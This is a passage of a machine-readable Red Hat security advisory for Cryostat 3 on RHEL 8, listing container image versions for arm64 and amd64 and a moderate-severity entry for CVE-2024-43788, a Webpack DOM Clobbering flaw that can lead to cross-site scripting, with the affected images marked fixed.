"name": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"product_id": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-grafana-dashboard-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"product": {
"name": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"product_id": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"product": {
"name": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"product_id": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-reports-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"product": {
"name": "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"product_id": "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"product": {
"name": "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"product_id": "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-operator-bundle\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"product": {
"name": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"product_id": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-rhel8-operator\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"product": {
"name": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"product_id": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-storage-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"product": {
"name": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"product_id": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/jfr-datasource-rhel8\u0026tag=3.0.1-3"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"product": {
"name": "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"product_id": "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-db-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"product": {
"name": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"product_id": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-grafana-dashboard-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"product": {
"name": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"product_id": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"product": {
"name": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"product_id": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-reports-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"product": {
"name": "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"product_id": "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"product": {
"name": "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"product_id": "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-operator-bundle\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"product": {
"name": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"product_id": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-rhel8-operator\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"product": {
"name": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"product_id": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-storage-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64",
"product": {
"name": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64",
"product_id": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64",
"product_identification_helper": {
"purl": "pkg:oci/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/jfr-datasource-rhel8\u0026tag=3.0.1-3"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64"
},
"product_reference": "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64"
},
"product_reference": "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64"
},
"product_reference": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64"
},
"product_reference": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64"
},
"product_reference": "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64"
},
"product_reference": "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64"
},
"product_reference": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64"
},
"product_reference": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64"
},
"product_reference": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64"
},
"product_reference": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64"
},
"product_reference": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64"
},
"product_reference": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64"
},
"product_reference": "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64"
},
"product_reference": "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64"
},
"product_reference": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64"
},
"product_reference": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64"
},
"product_reference": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
},
"product_reference": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
